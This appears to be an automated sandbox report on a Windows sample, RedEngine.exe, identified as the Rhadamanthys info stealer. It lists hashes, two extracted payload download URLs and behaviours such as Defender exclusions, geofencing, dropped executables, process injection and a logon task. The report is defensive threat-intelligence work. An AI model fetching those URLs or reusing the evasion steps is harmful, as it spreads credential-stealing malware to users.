Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
20-06-2024 03:20
Static task
static1
Behavioral task
behavioral1
Sample
RedEngine.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
RedEngine.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral3
Sample
libEGL.dll
Resource
win7-20240220-en
Behavioral task
behavioral4
Sample
libEGL.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
libGLESv2.dll
Resource
win7-20240419-en
Behavioral task
behavioral6
Sample
libGLESv2.dll
Resource
win10v2004-20240611-en
General
-
Target
RedEngine.exe
-
Size
7KB
-
MD5
b5e479d3926b22b59926050c29c4e761
-
SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24
-
SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
-
SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
-
SSDEEP
192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio
Malware Config
Extracted
https://rentry.org/lem61111111111/raw
Extracted
https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
j1dicjdx.pjl1.exesvchost.exedescription pid process target process PID 1032 created 2620 1032 j1dicjdx.pjl1.exe sihost.exe PID 4952 created 2248 4952 svchost.exe findstr.exe -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exemsiexec.exepowershell.exeflow pid process 8 3944 powershell.exe 12 3944 powershell.exe 34 4048 powershell.exe 35 4396 powershell.exe 56 4440 msiexec.exe 62 4280 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2124 powershell.exe 3944 powershell.exe 4396 powershell.exe 4048 powershell.exe 4280 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
RedEngine.exej1dicjdx.pjl0.exej1dicjdx.pjl3.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation RedEngine.exe Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation j1dicjdx.pjl0.exe Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation j1dicjdx.pjl3.exe -
Executes dropped EXE 4 IoCs
Processes:
j1dicjdx.pjl0.exej1dicjdx.pjl1.exej1dicjdx.pjl2.exej1dicjdx.pjl3.exepid process 1612 j1dicjdx.pjl0.exe 1032 j1dicjdx.pjl1.exe 1436 j1dicjdx.pjl2.exe 696 j1dicjdx.pjl3.exe -
Loads dropped DLL 6 IoCs
Processes:
MsiExec.exeMsiExec.exeMsiExec.exepid process 2476 MsiExec.exe 2476 MsiExec.exe 2476 MsiExec.exe 2476 MsiExec.exe 4672 MsiExec.exe 4428 MsiExec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 3544 powercfg.exe 4676 powercfg.exe 4976 powercfg.exe 384 powercfg.exe -
Drops file in System32 directory 16 IoCs
Processes:
svchost.exesvchost.exesvchost.exeOfficeClickToRun.exej1dicjdx.pjl2.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\RunNodeScriptAtLogon svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\MRT.exe j1dicjdx.pjl2.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
j1dicjdx.pjl2.exedescription pid process target process PID 1436 set thread context of 4392 1436 j1dicjdx.pjl2.exe dialer.exe -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files\nodejs\node_modules\npm\node_modules\@tufjs\models\dist\snapshot.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@pkgjs\parseargs\examples\simple-hard-coded.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-version.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\emoji-regex\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-audit-report\lib\colors.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\major.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-prune.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@tufjs\models\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\esm\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\text-table\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\protobuf-specs\dist\__generated__\sigstore_common.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\tlog\intoto.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\https-proxy-agent\dist\parse-proxy-response.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\universal.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\signal-exit\dist\cjs\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\protobuf-specs\dist\__generated__\google\protobuf\descriptor.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-uninstall.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\color-convert\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\diff\base.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\tokenize.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\ci-info\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-restart.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\pattern.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\safer-buffer\Porting-Buffer.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\which\node_modules\isexe\dist\mjs\posix.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\bundle\dist\bundle.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\isexe\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\mkdirp\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man7\scripts.7 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\graceful-fs\graceful-fs.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\config\lib\definitions\definitions.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cross-spawn\node_modules\which\which.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\constructors.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-query.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\themes\generic-logging.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\run-script\lib\node-gyp-bin\node-gyp msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\trust\trust.types.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\lib\link-mans.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tiny-relative-date\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\lifecycle-cmd.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmfund\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\string-width-cjs\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\read-entry.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\bin\npx.cmd msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\just-diff\index.cjs msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\prefix.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\lib\link-bin.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\fastest-levenshtein\LICENSE.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\ignore.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@isaacs\string-locale-compare\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\fs\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\package-json\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\diff\json.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\pattern.d.ts.map msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-package-arg\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\promise-retry\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\extendStringPrototype.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\lib\depth.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\err-code\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-outdated.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-deprecate.md msiexec.exe -
Drops file in Windows directory 17 IoCs
Processes:
msiexec.exesvchost.exedescription ioc process File opened for modification C:\Windows\Installer\MSID4D4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID533.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\e57d07f.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIE199.tmp msiexec.exe File created C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\e57d07f.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID553.tmp msiexec.exe File opened for modification C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon msiexec.exe File opened for modification C:\Windows\Installer\MSI3672.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\Installer\MSIEAC2.tmp msiexec.exe File created C:\Windows\Installer\e57d083.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI3922.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{637236E9-EF59-4F9D-8269-3083C1A6C6D6} msiexec.exe -
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3948 sc.exe 920 sc.exe 4052 sc.exe 4376 sc.exe 5048 sc.exe 3268 sc.exe 1980 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString -
Delays execution with timeout.exe 64 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 540 timeout.exe 2660 timeout.exe 1912 timeout.exe 400 timeout.exe 740 timeout.exe 3836 timeout.exe 1244 timeout.exe 4684 timeout.exe 1440 timeout.exe 3388 timeout.exe 2472 timeout.exe 1456 timeout.exe 1460 timeout.exe 1976 timeout.exe 2344 timeout.exe 1568 timeout.exe 4484 timeout.exe 2088 timeout.exe 1568 timeout.exe 2008 timeout.exe 2108 timeout.exe 444 timeout.exe 4048 timeout.exe 2640 timeout.exe 2388 timeout.exe 3248 timeout.exe 2504 timeout.exe 4072 timeout.exe 2964 timeout.exe 2040 timeout.exe 1916 timeout.exe 4496 timeout.exe 5108 timeout.exe 2964 timeout.exe 4156 timeout.exe 4864 timeout.exe 3152 timeout.exe 1980 timeout.exe 4848 timeout.exe 4404 timeout.exe 4752 timeout.exe 1620 timeout.exe 4580 timeout.exe 4668 timeout.exe 1048 timeout.exe 1172 timeout.exe 2128 timeout.exe 1772 timeout.exe 2264 timeout.exe 3388 timeout.exe 4044 timeout.exe 2664 timeout.exe 4468 timeout.exe 3500 timeout.exe 4500 timeout.exe 4636 timeout.exe 3440 timeout.exe 1616 timeout.exe 1832 timeout.exe 2556 timeout.exe 3792 timeout.exe 4116 timeout.exe 4668 timeout.exe 1980 timeout.exe -
Enumerates processes with tasklist 1 TTPs 8 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 2912 tasklist.exe 2924 tasklist.exe 3948 tasklist.exe 4516 tasklist.exe 4260 tasklist.exe 3276 tasklist.exe 5016 tasklist.exe 636 tasklist.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
WerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3348 taskkill.exe 376 taskkill.exe 1392 taskkill.exe 4980 taskkill.exe 4760 taskkill.exe 2808 taskkill.exe 408 taskkill.exe 3696 taskkill.exe -
Modifies data under HKEY_USERS 18 IoCs
Processes:
OfficeClickToRun.exesvchost.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718853741" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 20 Jun 2024 03:22:21 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={17A4AEC2-36C5-461D-B3D7-69EA6DF4A33D}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe -
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exemsiexec.exeExplorer.EXEsihost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fff0d426-12ad-4b59- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a064af26-1f6e-421f- = cdab3218c1c2da01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fd44db94-ca55-494b- = aedf3b18c1c2da01 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a760a2bd-872c-44e1- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fd44db94-ca55-494b- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b7a303d6-4f96-4f11- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000097e2b417c1c2da01a6fafd17c1c2da01a6fafd17c1c2da01dcba09000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d458d11a2000323263393831623039313439656134333533303332646339363264323333396634633162343433383066356230373139383261323630326630363331643632630000b20009000400efbed458d11ad458d11a2e00000000000000000000000000000000000000000000000000f5da2700320032006300390038003100620030003900310034003900650061003400330035003300300033003200640063003900360032006400320033003300390066003400630031006200340034003300380030006600350062003000370031003900380032006100320036003000320066003000360033003100640036003200630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000065a33f851000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32326339383162303931343965613433353330333264633936326432333339663463316234343338306635623037313938326132363032663036333164363263000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000746d756163626c6200000000000000006ab64a1a2e42fe4ca0c710bf0da5f31510e263632528ef1186ec6e9b7344ec166ab64a1a2e42fe4ca0c710bf0da5f31510e263632528ef1186ec6e9b7344ec16ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003000380030003200390032003200370032002d003200300034003000330036003100350030002d0032003100350039003100370031003700370030002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a1a8d825000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\936314a9-4f70-490d- = aa894418c1c2da01 RuntimeBroker.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\PackageName = "nodejs-installer.msi" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fd44db94-ca55-494b- RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 msiexec.exe Set value (str) 